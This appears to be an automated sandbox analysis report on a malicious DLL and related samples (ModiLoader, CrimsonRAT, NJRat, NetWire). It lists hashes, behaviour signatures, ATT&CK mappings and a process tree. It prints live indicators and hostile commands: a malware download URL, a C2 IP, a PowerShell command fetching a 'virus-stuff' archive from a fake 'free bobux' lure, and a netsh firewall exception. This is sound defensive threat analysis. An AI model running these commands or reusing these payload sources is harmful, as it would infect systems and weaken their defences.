Analysis
-
max time kernel
300s -
max time network
299s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
-
submitted
04-08-2024 04:46
General
-
Target
Utilla_1.dll
-
Size
32KB
-
MD5
507c8df844d325053a70f909a0e3bcdc
-
SHA1
9a74b55805e67299ffafe0ea150fd81f11bc6dbc
-
SHA256
97ce63444a82e4301bc6c0ec38ea30452f31b100fa30b8d616bc7eb1bf0a482d
-
SHA512
bda872730d77197c8491fd7bb5ac174822972c3e3d5d59120cd2febc6a0368891332dbcd47335e51b33729eb877ddb3b587a3372b3e8263a54a0f520d8779fc0
-
SSDEEP
768:QOBGC29wjrE58Iu3ZBdrXm8VsB17DeTNxYD:QOBGC26jrE58IuhrXFVsCNxYD
Malware Config
Extracted
modiloader
https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download
Extracted
crimsonrat
185.136.161.124
Signatures
-
CrimsonRAT main payload 1 IoCs
-
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader First Stage 1 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Drops startup file 3 IoCs
-
Executes dropped EXE 1 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Drops file in System32 directory 3 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 4 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 3 IoCs
-
NTFS ADS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\Utilla_1.dll,#11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd5e2c3cb8,0x7ffd5e2c3cc8,0x7ffd5e2c3cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4556 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6008 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5296 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5240 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1640 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6956 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,13603355192436041714,1335076393242493501,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5608 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FD28.tmp\FD29.tmp\FD2A.bat C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C421.tmp\C422.tmp\C423.bat C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 20 /nobreak3⤵
- Delays execution with timeout.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\free bobux.bat" "1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak2⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NJRat.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NJRat.exe"1⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NJRat.exe" "NJRat.exe" ENABLE2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004CC1⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"1⤵
-
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.1MB
MD564261d5f3b07671f15b7f10f2f78da3f
SHA1d4f978177394024bb4d0e5b6b972a5f72f830181
SHA25687f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad
SHA5123a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a
-
Filesize
56KB
MD5b635f6f767e485c7e17833411d567712
SHA15a9cbdca7794aae308c44edfa7a1ff5b155e4aa8
SHA2566838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e
SHA512551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
152B
MD53e681bda746d695b173a54033103efa8
SHA1ae07be487e65914bb068174b99660fb8deb11a1d
SHA256fee5f7377e5ca213c1d8d7827b788723d0dd2538e7ce3f35581fc613fde834c2
SHA5120f4381c769d4ae18ff3ac93fd97e8d879043b8ec825611db27f08bd44c08babc1710672c3f93435a61e40db1ccbf5b74c6363aaaf5f4a7fc95a6a7786d1aced8
-
Filesize
152B
MD59f081a02d8bbd5d800828ed8c769f5d9
SHA1978d807096b7e7a4962a001b7bba6b2e77ce419a
SHA256a7645e1b16115e9afec86efa139d35d5fecc6c5c7c59174c9901b4213b1fae0e
SHA5127f3045f276f5bd8d3c65a23592419c3b98f1311c214c8e54a4dfe09122a08afb08ab7967b49bd413bc748ce6363658640bc87958d5e0a78974680a8f9beadf44
-
Filesize
1KB
MD5438fae8f123f5c19fd4f3519d4ed8ced
SHA16a167ca2595a40e6f2e91ba4a89424bc2480e10d
SHA2563bb7f70b828c80098b60b8f0a8f4911cd6079a9c007c25e34db52734baa91092
SHA512788c3e2a91ddb416072006a07af21c3a17a6cc7ecee7833061f35c6b2531234fdf917347ac04115dc7c949ec2aa52f7034fe84706719e0efed5b4e7682388fc8
-
Filesize
64KB
MD5d6b36c7d4b06f140f860ddc91a4c659c
SHA1ccf16571637b8d3e4c9423688c5bd06167bfb9e9
SHA25634013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
SHA5122a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487
-
Filesize
67KB
MD51d9097f6fd8365c7ed19f621246587eb
SHA1937676f80fd908adc63adb3deb7d0bf4b64ad30e
SHA256a9dc0d556e1592de2aeef8eed47d099481cfb7f37ea3bf1736df764704f39ddf
SHA512251bf8a2baf71cde89873b26ee77fe89586daf2a2a913bd8383b1b4eca391fdd28aea6396de3fdff029c6d188bf9bb5f169954e5445da2933664e70acd79f4e3
-
Filesize
41KB
MD5ed3c7f5755bf251bd20441f4dc65f5bf
SHA13919a57831d103837e0cc158182ac10b903942c5
SHA25655cbb893756192704a23a400bf8f874e29c0feee435f8831af9cbe975d0ef85d
SHA512c79460ded439678b6ebf2def675cbc5f15068b9ea4b19263439c3cca4fa1083dc278149cde85f551cd2ffc2c77fd1dc193200c683fc1c3cdac254e533df84f06
-
Filesize
63KB
MD5710d7637cc7e21b62fd3efe6aba1fd27
SHA18645d6b137064c7b38e10c736724e17787db6cf3
SHA256c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b
SHA51219aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44
-
Filesize
19KB
MD52e86a72f4e82614cd4842950d2e0a716
SHA1d7b4ee0c9af735d098bff474632fc2c0113e0b9c
SHA256c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f
SHA5127a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1
-
Filesize
88KB
MD5b38fbbd0b5c8e8b4452b33d6f85df7dc
SHA1386ba241790252df01a6a028b3238de2f995a559
SHA256b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd
SHA512546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16
-
Filesize
1.2MB
MD5027a77a637cb439865b2008d68867e99
SHA1ba448ff5be0d69dbe0889237693371f4f0a2425e
SHA2566f0e8c5ae26abbae3efc6ca213cacaaebd19bf2c7ed88495289a8f40428803dd
SHA51266f8fbdd68de925148228fe1368d78aa8efa5695a2b4f70ab21a0a4eb2e6e9f0f54ed57708bd9200c2bbe431b9d09e5ca08c3f29a4347aeb65b090790652b5c4
-
Filesize
4KB
MD5330457eed56cc4f9ebb9da7ab85a42b4
SHA1e263376fcddafca6fdafa7c21f76bbddcf3206ae
SHA256ba2a9d4db5d8df4b5554d073f76fb7ca89513633ab92981074a571dc31812b2c
SHA5121c7339a347f8c9ac579e2779ce48a3e972fe04192d799588f559d718b9483fd729670dfab91436d5d22e1c2886b9b930659b3894797a4caeba30501d3776d820
-
Filesize
3KB
MD58c45fb23c3dc01cb741528c7b9c06691
SHA1bb219d06747fb7aef8cac70f29fdc723edd7a305
SHA256d928f79b2e5669f8a2837eb390ba5915d09b78546043b2ed8c3b8844a70ff902
SHA5123246441597edf4d3799a24cdbeb8dac6965403340d817c4a562d42af79d829c14a428937f2019102646525ca5a7f5b65637bb7f2f56afda06640ccdb08e45975
-
Filesize
939B
